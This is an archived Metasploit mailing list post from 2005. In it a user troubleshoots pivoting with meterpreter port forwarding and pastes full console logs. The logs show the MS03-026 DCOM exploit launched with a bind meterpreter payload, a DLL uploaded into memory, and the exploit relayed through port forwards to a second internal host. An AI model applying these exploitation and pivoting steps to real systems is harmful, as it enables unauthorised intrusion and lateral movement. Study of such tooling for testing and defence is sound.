Metasploit mailing list archives
use of meterpreter (copy for the list )
From: thomas.werth at vahle.de (Thomas Werth)
Date: Mon, 18 Apr 2005 10:07:48 +0200
Does the bind handler ever say it established the connection? Does it say this before or after the 'Connected to REMACT'? If it says that the bind handler has established the connection before the 'REMACT' line then you may have created the port forward too soon. Can you include the full output from the exploit command?
bind handler doesn't say it establishes a connection. Just saw that on meterpreter window an error is thrown up open_tcp_channel: failure, 10061. i'll attach full log of what i did, just as note after meterpreter> portfwd -v Local port forward listeners: 127.0.0.1:9000 <-> 10.10.10.77:135 127.0.0.1:4444 <-> 10.10.10.77:4444 meterpreter> i start second window and when hitting in second window "exploit" the error msg comes in window 1 . here's the log : "Window 1" vpc189:/usr/local/security/exploits/framework-2.3 # ./msfconsole _ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _) | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ |_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___) |_| + -- --=[ msfconsole v2.3 [56 exploits - 69 payloads] msf > use msrpc_dcom_ms03_026 msf msrpc_dcom_ms03_026 > show options Exploit Options =============== Exploit: Name Default Description -------- ------ ------- ------------------ required RHOST The target address required RPORT 135 The target port Target: Windows NT SP6/2K/XP/2K3 ALL msf msrpc_dcom_ms03_026 > set RHOST 10.10.10.88 RHOST -> 10.10.10.88 msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind_meterpreter PAYLOAD -> win32_bind_meterpreter msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > show options Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ ----------- ------------------ required RHOST 10.10.10.88 The target address required RPORT 135 The target port Payload: Name Default Description -------- -------- ---------------------------------------------------------------------- ------------------------------------------ required EXITFUNC thread Exit technique: "process", "thread", "seh" required METDLL /usr/local/security/exploits/framework-2.3/data/meterpreter/metsrv.dll The full path the meterpreter server dll required LPORT 4444 Listening port for bind shell Target: Windows NT SP6/2K/XP/2K3 ALL msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > exploit [*] Starting Bind Handler. [*] Connected to REMACT with group ID 0x9a3c [*] Got connection from 10.10.10.189:32784 <-> 10.10.10.88:4444 [*] Sending Stage (2834 bytes) [*] Sleeping before sending dll. [*] Uploading dll to memory (69643), Please wait... [*] Upload completed meterpreter> [ -= connected to =- ] [ -= meterpreter server =- ] [ -= v. 00000500 =- ] meterpreter> use -m Net loadlib: Loading library from 'ext212326.dll' on the remote machine. meterpreter> loadlib: success. meterpreter> portfwd -a -L 127.0.0.1 -l 9000 -h 10.10.10.77 -p 135 portfwd: Successfully created local listener on port 9000. meterpreter> portfwd -a -L 127.0.0.1 -l 4444 -h 10.10.10.77 -p 4444 portfwd: Successfully created local listener on port 4444. meterpreter> portfwd -v Local port forward listeners: 127.0.0.1:9000 <-> 10.10.10.77:135 127.0.0.1:4444 <-> 10.10.10.77:4444 meterpreter> open_tcp_channel: failure, 10061. meterpreter> ------------------------------------------------------- "Window 2" vpc189:/usr/local/security/exploits/framework-2.3 # ./msfconsole | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| + -- --=[ msfconsole v2.3 [56 exploits - 69 payloads] msf > use msrpc_dcom_ms03_026 msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind win32_bind win32_bind_meterpreter win32_bind_stg_upexec win32_bind_dllinject win32_bind_stg win32_bind_vncinject msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind PAYLOAD -> win32_bind msf msrpc_dcom_ms03_026(win32_bind) > show options Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ ------- ------------------ required RHOST The target address required RPORT 135 The target port Payload: Name Default Description -------- -------- ------- ------------------------------------------ required EXITFUNC thread Exit technique: "process", "thread", "seh" required LPORT 4444 Listening port for bind shell Target: Windows NT SP6/2K/XP/2K3 ALL msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 127.0.0.1 RHOST -> 127.0.0.1 msf msrpc_dcom_ms03_026(win32_bind) > set RPORT 9000 RPORT -> 9000 msf msrpc_dcom_ms03_026(win32_bind) > exploit [*] Starting Bind Handler. [*] Got connection from 127.0.0.1:32786 <-> 127.0.0.1:4444 [*] Exiting Bind Handler. msf msrpc_dcom_ms03_026(win32_bind) > --------------------------------------------- i'm getting same error when delaying creation of portfwd to right after "Connected to REMACT with group ID 0xecd7" here's a second log of window 2 msf msrpc_dcom_ms03_026(win32_bind) > exploit [*] Starting Bind Handler. [*] Connected to REMACT with group ID 0xecd6 [*] Exiting Bind Handler. msf msrpc_dcom_ms03_026(win32_bind) > exploit [*] Starting Bind Handler. [*] Connected to REMACT with group ID 0xecd7 [*] Got connection from 127.0.0.1:32814 <-> 127.0.0.1:4444 [*] Exiting Bind Handler. msf msrpc_dcom_ms03_026(win32_bind) > First i tried without portfwd of Port 4444, second i pushed it right in after connect msg. here's according log from window 1: meterpreter> portfwd -r -L 127.0.0.1 -l 4444 -h 10.10.10.77 -p 4444 portfwd: Successfully destroyed local listener on port 4444. meterpreter> portfwd -a -L 127.0.0.1 -l 4444 -h 10.10.10.77 -p 4444 portfwd: Successfully created local listener on port 4444. meterpreter> open_tcp_channel: failure, 10061. meterpreter> hope this will help you to help me :D
Current thread:
- use of meterpreter Thomas Werth (Apr 14)
- use of meterpreter mmiller at hick.org (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 15)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 19)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 19)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 19)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 20)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter mmiller at hick.org (Apr 14)